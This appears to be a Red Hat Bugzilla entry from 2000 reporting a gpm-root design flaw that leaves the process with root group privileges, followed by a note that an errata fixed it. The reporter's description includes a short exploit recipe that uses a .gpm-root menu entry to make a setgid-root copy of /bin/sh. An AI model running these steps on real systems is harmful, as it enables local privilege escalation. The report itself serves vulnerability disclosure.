Bug 10340 - Exploit in gpm-root.
Summary: Exploit in gpm-root.
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: gpm
Version: 6.1
Hardware: All
OS: Linux
Target Milestone: ---
Assignee: Preston Brown
QA Contact:
URL: http://securityfocus.com/vdb/bottom.h...
Keywords: Security
Depends On:
TreeView+ depends on / blocked
Reported: 2000-03-25 02:24 UTC by zurk
Modified: 2008-05-01 15:37 UTC (History)
0 users

Clone Of:
Last Closed: 2000-05-08 20:47:29 UTC

Attachments (Terms of Use)

Description zurk 2000-03-25 02:24:26 UTC
A vulnerability exists in the gpm-root program, part of the gpm package.
 This package is used to enable mice on the consoles of many popular
 Linux distributions. The problem is a design error, caused when a
 programmer chose to attempt to revert to the running users groups,
 after having called setuid to the users id already. The setgid call fails,
 and the process maintains the groups the gpm-root program is running
 as. This is usually the 'root' group.

Exploit :
cp /bin/sh /tmp
 create a .gpm-root file in ~ with the following:
 button 1 {
 name "create a setgid shell"
 "setgid shell" f.bgcmd "chgrp root /tmp/sh; chmod 2755 /tmp/sh"

 click control-left mouse button, and click "setgid shell"
 execute /tmp/sh

Comment 1 Preston Brown 2000-05-08 20:47:59 UTC
this has been solved w/an errata.

Note You need to log in before you can comment on or make changes to this bug.